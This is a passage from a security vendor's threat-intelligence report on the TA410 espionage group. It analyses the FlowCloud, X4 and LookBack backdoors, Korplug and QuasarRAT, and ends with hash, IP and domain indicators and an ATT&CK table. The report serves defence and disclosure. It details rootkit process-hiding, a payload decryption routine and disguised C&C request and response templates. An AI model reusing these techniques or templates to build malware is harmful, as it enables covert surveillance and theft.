since\r\nthe last user input. To limit the disk space used, images where fewer than 5% of the pixels differ from the most recently\r\nstored capture aren’t saved. This feature can also be invoked on demand by the server.\r\nAnother of the backdoor’s components records mouse and keyboard activity to a database. It does not collect these directly,\r\nbut instead acts in tandem with the keylogger component of the driver (described in the next section) by reading data from\r\nthe \\\\.\\pipe\\namedpipe_keymousespy_english named pipe.\r\nInterestingly, FlowCloud can also gather information about things happening around the victim’s computer. The first way it\r\ndoes so is through a C\u0026C command that takes a picture using connected camera peripherals. This feature is implemented\r\nusing the CCameraDS class from OpenCV.\r\nThe second way it can collect information about the computer’s surroundings is by recording audio. Much like a voice\r\nassistant, FlowCloud can use a computer’s microphone to listen to its surroundings, but instead of recording being triggered\r\nby a command word, it seems to be triggered by any sound over a threshold defined by the decibel_limit field of the\r\naudio_policy. The default value is 65 decibels, which is in the upper range of normal conversation volume (commonly\r\ndefined to be anywhere between 50 and 70 dB by various sources).\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 14 of 26\n\nSelf-decrypting DLL (setlangloc.dat)\r\nThe loaded shellcode is a self-decrypting DLL. It first decrypts the embedded DLL using a byte-oriented XOR-and-ADD\r\nscheme (shown in Figure 16). The shellcode we analyzed used the key 0x7B. Once it has decrypted the embedded DLL, the\r\nshellcode manually performs the functions of LoadLibrary and calls the loaded module’s startModule export.\r\nfor (int i=0; i \u003c ciphertext_length; i++)\r\n plaintext[i] = ((encrypted[i] ^ key) + key) \u0026 0xFF\r\nFigure 16. Pseudocode for the DLL decryption routine\r\nThis newly loaded module uses the same anti-debugging and anti-analysis techniques as the hijacking DLL described above.\r\nOn top of those, it also uses a few tricks of its own:\r\nCovers its tracks by overwriting the code previously modified by the malicious library with a useless call to lstrlenW.\r\nBase64-encoded strings are used for function imports (via GetProcAddress) and only decoded as needed.\r\nExits if the process’s executable is not the expected DLL hijacking target (e.g., setlang.exe).\r\nThe module creates a new process using the same executable and performs process injection on it, redirecting the existing\r\nthread to the written code region. This code inside the new process launches a thread that decrypts and loads the fcClient\r\nmodule before calling its startModule export. That function will perform the final stages of the installation and load the DLL\r\ncontaining the backdoor functionality.\r\nDriver (hidmouse.sys)\r\nFlowCloud’s driver serves a dual purpose: it acts as both a keylogger and a rootkit. It accomplishes this mainly by hijacking\r\nnative drivers’ handler functions for specific I/O control codes and replacing them with its own:\r\nRead (IRP_MJ_READ) for the keyboard driver (kbdclass or KeyboardClass0)\r\nRead (IRP_MJ_READ) for the mouse driver (mouclass or PointerClass0)\r\nDevice control (IRP_MJ_DEVICE_CONTROL) for the network driver (tcpip or nsiproxy)\r\nThe driver also provides kernel-level functionalities to be used by the RAT. They can be invoked via I/O control codes or by\r\nwriting to specific registry keys.\r\nThis module is signed with a certificate with the thumbprint 02ED6A578C575C8D9C72398E790354B095BB07BC. Issued\r\nto Hangzhou Leishite Laser Technology Co. in 2012 by Wosign and revoked in 2014, it seems most likely this certificate\r\nwas stolen.\r\nKeylogging\r\nIn its IRP_MJ_READ handlers for keyboard and mouse events, the driver simply records IO events to lookaside lists before\r\npassing them to the legitimate handler. This ensures that the driver doesn’t interfere in a way that could be noticeable by the\r\nuser. These events are then parsed to the format used by the backdoor’s keymouse_manager and written to the named pipe\r\n\\\\.\\pipe\\namedpipe_keymousespy_english.\r\nRootkit\r\nAfter hijacking the aforementioned drivers, the rootkit erases the DLL names associated with them from internal structures\r\nused to display device drivers.\r\nThe rootkit can prevent processes from being shown by utilities that list running processes, such as Task Manager. As shown\r\nin Figure 17, it achieves this by removing their entries from the ActiveProcessLinks list of the undocumented KPROCESS\r\nkernel structure. Since this structure is not part of the public API and can change between releases, the rootkit contains code\r\nto match the operating system’s build number to the correct offsets in this structure. That code covers all versions from\r\nWindows XP to Windows 10 20H1. This functionality can be invoked on any process via the\r\nIOCTL_HIDE_PROCESS_BY_PROCESSID (0x222028) control code. It is also used, on driver startup, to hide the process\r\nwith the PID contained in the registry key HKLM\\HARDWARE\\{76BA14B7-AF0C-4dc9-9E9D-2A6970F231D9}. This\r\nprocess is further camouflaged by changing its associated executable filename to one of svchost.exe or dllhost.exe in the\r\nsame kernel structure.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 15 of 26\n\nFigure 17. Function used to prevent a process from being displayed in lists of running processes\r\nThrough its hijacking of the network driver, the rootkit can also hide a single process’s network traffic from local utilities.\r\nThe process whose traffic is to be hidden is set through the IOCTL_SET_TRAFFICHIDE_PROCESSID (0x222048) control\r\ncode.\r\nSome of the rootkit’s functions are used by the fcClientDll module to hide the process in which it is running.\r\nControl codes to manipulate a process name in various internal structures are also exposed by the driver.\r\nPersistence module (fcClientWD)\r\nThis module is relatively simple compared to other components. The previously mentioned NetTask already accomplishes\r\npersistence in most cases, by executing on system startup. This module complements that mechanism by ensuring\r\npersistence in a very specific edge case where execution of the malware might be interrupted: the user logs out on a system\r\nwith hibernation and Fastboot enabled. On systems where either of those is disabled, this module does nothing.\r\nFlowCloud v4.1.3\r\nThis older version of FlowCloud has already been described in a Proofpoint blogpost and presents similarities to the newer\r\nversion described in the preceding subsections, so we will only highlight notable differences and new information revealed\r\nby our analysis.\r\nThis version runs multiple anti-analysis and anti-detection checks before executing its payload, and terminates if any of\r\nthose tests detect that the process is being analyzed. It checks running processes for executables of several known\r\ncybersecurity vendors. While most of these names are also present in version 5, this list is not a strict subset of the one v.5\r\nuses. This tends to support the proposition that versions 4 and 5 of FlowCloud are maintained in parallel.\r\nIt also embeds a DLL version of the Pafish (aka Paranoid Fish) sandbox and analysis detection tool as one of its encrypted\r\nresources. This library is loaded in memory and all of the anti-analysis/anti-sandboxing checks it implements are run.\r\nInterestingly, the driver installed is the same as the one for version 5.0.2. Those used by version 5.0.3 provide identical\r\nfunctionality, but differ slightly.\r\nTA410 – LookingFrog\r\nLookingFrog uses two main malware families: X4 and LookBack. We have seen both of them on machines belonging to the\r\nsame victim.\r\nX4\r\nX4 is a custom backdoor that is used as a first stage, before LookBack is deployed. It is loaded by a VMProtect-ed loader,\r\nusually named PortableDeviceApi.dll or WptsExtensions.dll. Unfortunately, we were not able to uncover any persistence\r\nmethod.\r\nThe loader injects an orchestrator into memory in a svchost.exe process. In turn, the orchestrator injects the network\r\ncomponent into memory and communicates with it via a file located at\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 16 of 26\n\nC:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\Log\\rsa.txt. Figure 18 shows a summary of the X4 components.\r\nFigure 18. Summary of the X4 components\r\nThe network component is shellcode. It is encrypted using the AES algorithm and stored in the Windows registry. Table 2\r\nshows the three registry keys used by X4.\r\nTable 2. Network shellcode registry keys\r\nRegistry Key Description\r\nHKLM\\SOFTWARE\\Microsoft\\DRM\\X4Key AES key.\r\nHKLM\\SOFTWARE\\Microsoft\\DRM\\PSKey\r\nName of the process into which the shellcode will be injected\r\n(spoolsv.exe).\r\nHKLM\\SOFTWARE\\Microsoft\\DRM\\X4Data Encrypted shellcode.\r\nThe decrypted shellcode looks like it was based on Metasploit and communicates with a hardcoded IP address via HTTP. An\r\ninteresting characteristic is that it uses the fake Host header onedrive.live.com.\r\nEvery second, the orchestrator, which lives in memory only, reads the cleartext rsa.txt file to check whether there are new\r\ncommands to execute. The commands are received from the C\u0026C server, via the network shellcode. In the orchestrator, the\r\ncommands are identified by a numerical identifier that is computed from the command name, as shown in Figure 19.\r\nFigure 19. Custom hash function seen in X4\r\nThe orchestrator handles seven commands, detailed in Table 3. Output of these commands is written to\r\nC:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\Log\\output.log.\r\nTable 3. X4 backdoor commands\r\nID Name Description\r\n0x3ECFF9B9D92 osload\r\nWrite new encrypted shellcode to HKLM\\SOFTWARE\\Microsoft\\DRM\\X4Data. It can\r\nalso modify X4Key and PSKey.\r\n0x3F5FAFC0EDD pskill Kill a process by PID.\r\n0x3F5FB1E6015 pslist List the running processes using CreateToolhelp32Snapshot and Process32Next.\r\n0x3B6C27610D1 inject Decrypt and inject shellcode, from encrypted form on disk, into memory.\r\n0xDA83E71 exec Execute a given command line.\r\n0xE9478DC live Get the PID of the process in which the orchestrator is running.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 17 of 26\n\nID Name Description\r\n0x6D6E70D40 cacls Modify the access controls of a given object using SetEntriesInAclA,\r\nSetNamedSecurityInfoA, and BuildExplicitAccessWithName.\r\nX4 provides basic functionalities to control the machine remotely, but it lacks more advanced spying capabilities.\r\nLookBack\r\nThe LookBack backdoor has previously been described by Proofpoint; we are therefore providing a quick summary and our\r\nanalysis of the custom network protocol.\r\nBackdoor\r\nIn all samples we observed, the LookBack loader is a legitimate version of libcurl.dll with the curl_share_init (ordinal #52)\r\nexport modified to load the SodomNormal communications module. This corroborates the observation by Proofpoint\r\nresearchers. This module is embedded in the library’s resource section and encrypted with an algorithm similar to RC4. The\r\nencryption/decryption function, shown in Figure 20, always uses the same key.\r\nFigure 20. Decompiled view of the function used to encrypt and decrypt the embedded module\r\nThe SodomNormal component tries to read configuration information from a sodom.ini file. This configuration file is\r\nencrypted using the just-described function and starts with the magic bytes 0xAF1324BC. If this file is unavailable or\r\ninvalid, a hardcoded default configuration is used.\r\nA unique victim ID is then generated from the victim’s CPUID, username, and IP address. This is sent to the server along\r\nwith the computer’s name and the configuration data. The communications module then downloads the main backdoor\r\nmodule, named SodomMain, from the C\u0026C server. Unfortunately, we couldn’t obtain this module.\r\nCommunication protocol\r\nLookBack can communicate over HTTP or via its “normal protocol”. In either case, the data being transferred is the same.\r\nLookBack’s normal protocol uses raw TCP sockets and a custom message format described in Table 4. This message is\r\ncomposed of eight header fields, followed by a body of variable length. The message body is encrypted with the function\r\npreviously described for the SodomNormal resource in the loader (Figure 20). The encrypted data is then compressed with\r\nthe deflate algorithm via the compress function of the statically linked zlib.\r\nTable 4. LookBack message format\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 18 of 26\n\nField Offset (bytes) Note\r\nMagic bytes 0x00\r\nThe constant 0x48AB2EC2. Messages that don’t start with this magic\r\nvalue are discarded.\r\n\u003cMessage dependent\u003e 0x04\r\nCompressed body size 0x08\r\nUncompressed body size 0x0C\r\nChecksum 0x10 CRC32 of the message body.\r\nMessage type 0x14\r\nInteger value indicating the message’s content and the associated action\r\nto be performed.\r\nWe have found code for over 50 message types. There seems to be little\r\nto no overlap between the values used by the client and the server. Table 5\r\npresents the types we have analyzed in more depth.\r\n\u003cMessage dependent\u003e 0x18\r\n\u003cMessage dependent\u003e 0x1C\r\nMessage Body 0x20\r\nThe message body can be empty. In this case, the checksum and length\r\nfields are set to 0x00.\r\nTable 5. LookBack message types\r\nMessage\r\ntype\r\nUsed\r\nby\r\nDescription\r\n2 Client\r\nRegister with C\u0026C server. The body contains configuration and information about the\r\nvictim host.\r\n3 Server Acknowledgment for message type 2.\r\n8 Client Request to download the main backdoor component (SodomMain).\r\n9 Server Reply to message type 8. The message body contains the SodomMain file.\r\n36 and 38 Client Transfer file to server in message body.\r\n35 and 37 Server Response to message 36 or 38.\r\n41 Client Request file from server.\r\n42 Server Transfer file to client in message body (response to message 41)\r\nThe HTTP protocol uses the message format detailed in the previous paragraph, but it adds a few extra steps to disguise its\r\ntraffic as legitimate HTTP. It uses a pair of hardcoded templates, one for client requests and another for server responses.\r\nThe fields required for HTTP, such as content length, address, and port number, are filled in with the correct values; useless\r\ndata is used for the others.\r\nFor client requests, the messages are encoded with a modified hexadecimal algorithm that uses the encoding alphabet a-p\r\ninstead of the conventional 0-9a-f. This provides some obfuscation and ensures that messages will not contain binary data or\r\nbe obviously hex encoded, both of which could look suspicious in an application/x-www-form-urlencoded message. The\r\nrequest’s body is composed of this encoded value prefixed with the hardcoded string id=1\u0026op=report\u0026status=. Client\r\nrequest and server response templates are shown in Figure 21 and Figure 22 respectively, with the template fields in angle\r\nbrackets.\r\nPOST \u003cC\u0026C address + port\u003e/status.php?r=\u003cepoch timestamp\u003e\u003crandom 16-bit int\u003e HTTP/1.1\r\nAccept: text/html, application/xhtml+xml, */*\r\nAccept-Language: en-us\r\nUser-Agent: \u003creturn value of ObtainUserAgentString OR \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geck\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nHost: \u003cC\u0026C url\u003e\r\nContent-Length: \u003ccontent length\u003e\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 19 of 26\n\nid=1\u0026op=report\u0026status=\u003cencoded LookBack message\u003e\r\nFigure 21. Template used for HTTP client requests\r\nOn the server side, the data described in the previous section is sent directly as binary data in the body with a header that\r\npurports that the data is a GIF image.\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.12.2\r\nDate: \u003ccurrent time\u003e GMT\r\nLast-Modified: \u003ccurrent time - 100 seconds\u003e GMT\r\nETag: \u003c3 random 16-bit ints\u003e\r\nAccept-Ranges: bytes\r\nContent-Length: \u003ccontent length\u003e\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: image/gif\r\n\u003cLookBack message\u003e\r\nFigure 22. Template used for HTTP server responses\r\nTA410 – JollyFrog\r\nThis third team uses off-the-shelf malware from the known malware families QuasarRAT and Korplug (aka PlugX).\r\nJollyFrog mostly aligns with what was described by Fortinet as APT10.\r\nKorplug\r\nKorplug, also known as PlugX, is a backdoor that has been used for years by many different cyberespionage groups. Despite\r\nbeing well known, it is still in use and we have observed TA410 using it as recently as in April 2021.\r\nIn the case of TA410, Korplug arrives as a RARSFX archive, generally named m.exe, containing three files:\r\nqrt.dll: A custom loader.\r\nqrtfix.exe: A legitimate signed application from F-Secure, vulnerable to DLL search-order hijacking.\r\nqrt.dll.usb: The Korplug shellcode.\r\nThe loader allocates memory using VirtualAlloc and copies the content of qrt.dll.usb there. Then it jumps right into the\r\nshellcode that will decompress and load the Korplug payload.\r\nQuasarRAT\r\nQuasarRAT is a full-featured backdoor freely available on GitHub. It is used by numerous threat actors who perform\r\ncyberespionage or cybercrime.\r\nTA410 uses a custom downloader and a custom loader written in .NET, which are convenient for identifying their instances\r\nof QuasarRAT among all the noise created by other attackers.\r\nNamed sll.exe, this downloader is digitally signed with the certificate seen in Figure 23. The certificate is likely stolen and\r\nbelongs to 北京和赢讯时科技有限公司 (translated: Beijing Heyingxunshi Technology Co., Ltd.) with thumbprint\r\n850821D88A4475F0310F10FBA806353A4113D252. Although the certificate has now been revoked, it was still valid when\r\nthis sample was signed on August 10th, 2020.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 20 of 26\n\nFigure 23. Digital signature of the QuasarRAT downloader\r\nThis downloader simply downloads the loader and encrypted QuasarRAT payload from the hardcoded C\u0026C server\r\nhttp://ffca.caibi379[.]com, at /rwjh/new/. This server was previously linked to FlowCloud (FlowingFrog). The loader is\r\nnamed PresentationCache.exe and is protected with DNGuard, a commercial .NET packer. It is also signed with the same\r\ncertificate as the downloader. It decrypts and loads the final QuasarRAT payload, which uses cahe.microsofts[.]org as its\r\nC\u0026C server.\r\nConclusion\r\nTA410 is a cyberespionage umbrella targeting high-profile entities such as governments and universities worldwide. ESET\r\nis revealing its latest findings about this group, including results from ongoing  research, during Botconf 2022.\r\nInitial access to targets is obtained by exploiting vulnerable internet-facing applications such as Microsoft Exchange, or by\r\nsending spearphishing emails with malicious attachments such as RTF documents created via the Royal Road builder. Even\r\nthough the JollyFrog team uses generic tools, FlowingFrog and LookingFrog have access to complex implants such as\r\nFlowCloud and LookBack. YARA and Snort rules for these implants are available in ESET's GitHub repository.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research now also offers private APT intelligence reports and data feeds. For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nFiles\r\nSHA-1 Filename Detection Description\r\nC96558312FBF5847351B0B6F724D7B3A31CCAF03 N/A Win32/Agent.UWR FlowCloud v5.0.3 ini\r\n1403241C415A8D686B1148FA4229A2EB833D8D08 setlangloc.dll Win32/Agent.UNL FlowCloud DLL hijac\r\n38D0E92AFF991CFC9C68D7BAAD6CB85916139AF5 hidmouse.sys Win32/Agent.UKR TA410 32-bit Rootkit\r\nAF978ED8AD37CE1437A6B42D96BF518D5C4CFD19 hidmouse.sys Win64/Agent.UKR TA410 64-bit Rootkit\r\nB70F3A3A9B5B8506EE95791469CA496E01AD7DAF winver32.dll Win32/Agent.ULH FlowCloud v4.1.3 hcC\r\n014421BDB1EA105A6DF0C27FC114819FF3637704 hhh.exe Win32/Agent.ABYK FlowCloud v4.1.3 ini\r\nEA298866E5A61FEEA4D062987F23B10A78C8A4CA N/A Win32/Agent.ULH FlowCloud v4.1.3 bac\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 21 of 26\n\nSHA-1 Filename Detection Description\r\n021B9E2E8AA30B29569254C0378A9F43E4F32EEC winver64.dll Win64/Agent.KM FlowCloud v4.1.3 hcC\r\n2A2F08FAD6B0A86DC94885224687D954E739CC21 N/A Win32/ParanoidFish.A Pafish sandbox detect\r\n3658B7CCA13C8C8AD03E9B6AEFE4B9CBE48E3C81 hidmouse.sys Win64/Agent.UKR TA410 Rootkit/Keylo\r\n517488F6BD0E7FC9EDE82F37226A75212B277E21 hidmouse.sys Win64/Agent.UKR TA410 Rootkit/Keylo\r\nC05B4AD7A3322917E17710842FB88A090198D51F N/A Win32/Agent.TWI LookBack trojanized\r\nDB2DF1BDF8145CB8ABA3A2026A3CC3EF4F1762BE phx.dll Win32/Agent.TWI LookBack trojanized\r\nEDE2AB811311FC011B1E89C5A0B7A60C123B7398 hidmouse.sys Win64/Agent.UKR TA410 Rootkit/Keylo\r\n7AA35BA7030AFCD271436DE8173D7B2F317A1BFC libcurl.dll Win32/Agent.TWI LookBack trojanized\r\nA5C02ABE698300F3DE0B7CC7F0856652753831DA libcurl.dll Win32/Agent.TWI LookBack trojanized\r\n613C4AFAE8F5F80F22DCD1827E3230FCA361ADA5 libcurl.dll Win32/Agent.UKD LookBack trojanized\r\n859CD6DFDADAB3D6427C6C1C29581CB2094D648F meterpreter.exe Win32/Rozena.CP Metasploit Meterprete\r\nDBEA7F0C0D2BF8BC365A2D1572CA1538FE8FB9A3 responsor.dat Win32/Agent.ULL FlowCloud fcClientD\r\nADD5B4FD9AEA6A38B5A8941286BC9AA4FE23BD20 絆邧坋蔡趕口昴.doc Win32/Exploit.Agent.TY Malicious Royal Roa\r\n7BA42061568FF6D9CA5FE5360DCE74C25EA48ADA N/A Win32/Agent.ACKQ Packed Tendyron dow\r\nD81215890703C48B8EA07A1F50FEC1A6CA9DF88B N/A Win32/TrojanDownloader.Agent.FLI Unpacked Tendyron d\r\nF359D3C074135BBCA9A4C98A6B6544690EDAE93D OnKeyToken_KEB.dll Win32/Injector.ELGA Tendyron malicious D\r\n621B31D5778EC2FB72D38FB61CED110A6844D094 N/A Win64/Rozena.AO X4 network shellcode\r\nBC11DC8D86A457A07CFE46B5F2EF6598B83C8A1F m.exe Win32/Injector.EMVA Korplug dropper.\r\nC369E1466F66744AA0E658588E7CF2C051EE842F qrt.dll Win32/Injector.EMVA Korplug loader.\r\nB868764C46BADC152667E9128375BA4F8D936559 qrt.dll.usb N/A Korplug encrypted pa\r\nBDECA89B4F39E6702CE6CBBC9E6D69F6BBAB01C8 N/A N/A Korplug decrypted pa\r\n5379FBB0E02694C524463FDF7F267A7361ECDD68 sll.exe MSIL/TrojanDownloader.Agent.GPS QuasarRAT download\r\n6CC6170977327541F8185288BB9B1B81F56D3FD0 PresentationCache.exe MSIL/Agent.TZG QuasarRAT loader.\r\nD95185A4A3F8512D92F69D2ED7B8743638C54BE8 N/A MSIL/Spy.Agent.AES QuasarRAT backdoor\r\nBE7F0E41CD514561AED43B07AA9F5F0842BF876C HTra.exe Win32/HackTool.Hucline.AB HUC Packet Transmi\r\n7F663F50E9D6376715AEB3AB66DEDE038258EF6C HTran13.exe Win32/HackTool.Hucline.S HUC Packet Transmi\r\nBEDA1224B3BB9F98F95FF7757D2687F4D9F4B53A event.exe Win32/Agent.UJN\r\nSimple cmd.exe-base\r\nMingW.\r\n2B61E7C63A0A33AAC4CF7FE0CEB462CF6DACC080 htran.exe Win32/HackTool.Hucline.AB HUC Packet Transmi\r\nEF3C796652141B8A68DCCF488159E96903479C29 htran_f-secury.exe Win32/HackTool.Hucline.AB HUC Packet Transmi\r\n6B547C244A3086B5B6EA2B3A0D9594BBE54AE06B inbt.zip Python/HackTool.Agent.J\r\nEXE masquerading a\r\nscanner (compiled wi\r\n4CDCE3AF614C2A5E60E71F1205812AB129C0955B msd017.exe Python/Exploit.MS17-010.B\r\nThis is a Python scann\r\nfor the vulnerability M\r\nCertificates\r\nSerial number 0F8B600FF1882E\r\nThumbprint 02ED6A578C575C8D9C72398E790354B095BB07BC\r\nSubject CN Hangzhou Leishite Laser Technology Co., Ltd.\r\nSubject O Hangzhou Leishite Laser Technology Co., Ltd.\r\nSubject L Hangzhou\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 22 of 26\n\nSerial number 0F8B600FF1882E\r\nSubject S Zhejiang\r\nSubject C CN\r\nValid from 2012-03-29 09:07:04 UTC\r\nValid to 2014-04-02 06:24:19 UTC\r\nSerial number 4ED8730F4E1B8558CD1CB0107B5F776B\r\nThumbprint 850821D88A4475F0310F10FBA806353A4113D252\r\nSubject CN 北京和 赢讯时 科技有限公司 (translation: Beijing   Heyingxunshi Technology Co., Ltd.)\r\nSubject O 北京和 赢讯时 科技有限公司 (translation: Beijing Heyingxunshi Technology Co., Ltd.)\r\nSubject OU 研 发 部 ( R\u0026D Department)\r\nSubject S 北京市 (Beijing)\r\nSubject C CN\r\nValid from 2019-11-13 00:00:00 UTC\r\nValid to 2020-11-12 23:59:59 UTC\r\nNetwork\r\nDomain IP First seen Details\r\n43.254.216[.]104 2020-06 Delivery server\r\n45.124.115[.]103 2020-08 Delivery server\r\n161.82.181[.]4 2020-12 Delivery server\r\n43.254.219[.]153 2020-07 X4 C\u0026C server\r\n154.223.141[.]36 2020-06 HTran C\u0026C server\r\n103.139.2[.]93 2020-10 Tendyron C\u0026C server\r\ncahe.microsofts[.]com QuasarRAT C\u0026C server\r\nffca.caibi379[.]com QuasarRAT downloader C\u0026C server\r\nsmtp.nsfwgo[.]com Korplug C\u0026C server\r\n45.124.115[.]103 2020-06 LookBack C\u0026C server\r\n185.225.19[.]17 2021-01 LookBack C\u0026C server\r\n94.158.245[.]249 2020-03 LookBack C\u0026C server\r\n5.252.179[.]227 2021-03 LookBack C\u0026C server\r\n222.186.151[.]141 2019-11 FlowCloud C\u0026C server\r\n47.111.22[.]65 2020-09 FlowCross C\u0026C server\r\n114.55.109[.]199 2020-05 FlowCloud C\u0026C server\r\ndlaxpcmghd[.]com 185.225.17[.]39 2020-09 LookBack C\u0026C server\r\nwwww.dlmum[.]com N/A FlowCloud C\u0026C server\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 9 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nTA410 develops LookBack and FlowCloud.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 23 of 26\n\nTactic ID Name Description\r\nT1588.003\r\nObtain Capabilities:\r\nCode Signing\r\nCertificates\r\nTA410 uses stolen code-signing certificates.\r\nT1588.005\r\nObtain Capabilities:\r\nExploits\r\nTA410 had exploits for ProxyLogon and ProxyShell.\r\nInitial\r\nAccess\r\nT1190\r\nExploit Public-Facing\r\nApplication\r\nTA410 has exploited web server vulnerabilities for initial\r\naccess.\r\nT1566.001\r\nPhishing:\r\nSpearphishing\r\nAttachment\r\nTA410 uses malicious RTF and DOCX attachments to\r\ncompromise victims.\r\nExecution\r\nT1106 Native API\r\nFlowCloud makes extensive use of the Windows API to\r\nexecute commands and launch processes.\r\nT1129 Shared Modules TA410’s backdoors can load DLLs and execute their payloads.\r\nT1203\r\nExploitation for Client\r\nExecution\r\nTA410 uses Royal Road RTF documents to compromise\r\nvictims.\r\nT1559.001\r\nInter-Process\r\nCommunication:\r\nComponent Object\r\nModel\r\nFlowCloud uses COM interfaces to schedule tasks and perform\r\nWMI queries.\r\nT1047\r\nWindows Management\r\nInstrumentation\r\nTA410 uses WMI for lateral movement and information\r\ngathering.\r\nPersistence\r\nT1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nFlowCloud creates a scheduled task for persistence.\r\nT1505.003\r\nServer Software\r\nComponent: Web\r\nShell\r\nTA410 plants webshells on vulnerable web servers.\r\nT1543.003\r\nCreate or Modify\r\nSystem Process:\r\nWindows Service\r\nFlowCloud can be configured to create a service for\r\npersistence.\r\nDefense\r\nEvasion\r\nT1027\r\nObfuscated Files or\r\nInformation\r\nFlowCloud files are distributed and stored in encrypted form.\r\nT1036.004\r\nMasquerading:\r\nMasquerade Task or\r\nService\r\nThe driver component of FlowCloud masquerades as a mouse\r\ndriver service.\r\nT1036.005\r\nMasquerading: Match\r\nLegitimate Name or\r\nLocation\r\nFiles named after legitimate utilities are written into the\r\n%ProgramFiles%\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\\r\nsubdirectory.\r\nT1014 Rootkit\r\nFlowCloud uses a rootkit to hide its network traffic and\r\nprocesses from system utilities.\r\nT1055.001\r\nProcess Injection:\r\nDynamic-link Library\r\nInjection\r\nFlowCloud uses both regular and reflective DLL injection. It\r\nalso manually loads some DLLs, bypassing calls to\r\nLoadLibrary.\r\nT1055 Process Injection\r\nTA410’s backdoors perform process injection to masquerade as\r\nharmless processes.\r\nT1055.003\r\nProcess Injection:\r\nThread Execution\r\nHijacking\r\nOne of FlowCloud’s DLLs replaces instructions in the loading\r\nprocess to make it execute code written in its memory.\r\nT1055.012\r\nProcess Injection:\r\nProcess Hollowing\r\nFlowCloud uses module stomping to hide the loading of its\r\nmain backdoor.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 24 of 26\n\nTactic ID Name Description\r\nT1140\r\nDeobfuscate/Decode\r\nFiles or Information\r\nMultiple TA410 backdoors communicate with their C\u0026C\r\nthrough encrypted and obfuscated channels.\r\nT1574.002\r\nHijack Execution\r\nFlow: DLL Side-Loading\r\nFlowCloud uses DLL Side-Loading to launch its second-stage\r\ndropper.\r\nT1497\r\nVirtualization/Sandbox\r\nEvasion\r\nSome versions of FlowCloud use the Pafish utility to detect\r\nvirtualization, sandboxes, and debuggers.\r\nT1134.002\r\nAccess Token\r\nManipulation: Create\r\nProcess with Token\r\nFlowCloud can create processes using tokens acquired from\r\nlegitimate processes.\r\nT1070.004\r\nIndicator Removal on\r\nHost: File Deletion\r\nFlowCloud deletes its rootkit’s executable after launching it.\r\nT1070.006\r\nIndicator Removal on\r\nHost: Timestomp\r\nFlowCloud backdates some files and services to 2013.\r\nDiscovery\r\nT1010\r\nApplication Window\r\nDiscovery\r\nWhen logging mouse events, FlowCloud gathers information\r\nabout the application running in the foreground.\r\nT1057 Process Discovery Multiple TA410 backdoors can list running processes.\r\nT1518 Software Discovery\r\nFlowCloud uses the IShellAppManager COM object to list\r\ninstalled software.\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nFlowCloud can search through connected file systems and\r\nobtain directory listings.\r\nT1120\r\nPeripheral Device\r\nDiscovery\r\nFlowCloud can list connected camera devices.\r\nT1016\r\nSystem Network\r\nConfiguration\r\nDiscovery\r\nFlowCloud can discover and use locally configured proxies.\r\nT1012 Query Registry FlowCloud components use registry keys to signal each other.\r\nT1115 Clipboard Data\r\nFlowCloud registers a listener to steal clipboard data when it is\r\nchanged.\r\nCollection T1056 Input Capture FlowCloud logs mouse clicks.\r\nT1056.001\r\nInput Capture:\r\nKeylogging\r\nFlowCloud records keystrokes.\r\nT1113 Screen Capture FlowCloud takes screenshots at regular intervals.\r\nT1125 Video Capture\r\nFlowCloud uses OpenCV to take pictures using connected\r\ncamera devices.\r\nT1123 Audio Capture FlowCloud has audio capture functionality.\r\nT1119 Automated Collection\r\nFlowCloud automatically collects data based on timers and\r\nevents.\r\nT1074.001\r\nData Staged: Local\r\nData Staging\r\nFlowCloud stores collected data in local SQLite databases prior\r\nto exfiltration.\r\nT1005\r\nData from Local\r\nSystem\r\nFlowCloud can exfiltrate files from local file systems.\r\nT1025\r\nData from Removable\r\nMedia\r\nFlowCloud can exfiltrate files from removable drives.\r\nT1560.002\r\nArchive Collected\r\nData: Archive via\r\nLibrary\r\nFlowCloud and LookBack use a statically linked zlib library to\r\ncompress data.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 25 of 26\n\nTactic ID Name Description\r\nT1560.003\r\nArchive Collected\r\nData: Archive via\r\nCustom Method\r\nFlowCloud compresses some collected data by removing\r\nduplicates and similar screen captures.\r\nCommand\r\nAnd Control\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web\r\nProtocols\r\nLookBack and FlowCloud can send and receive data 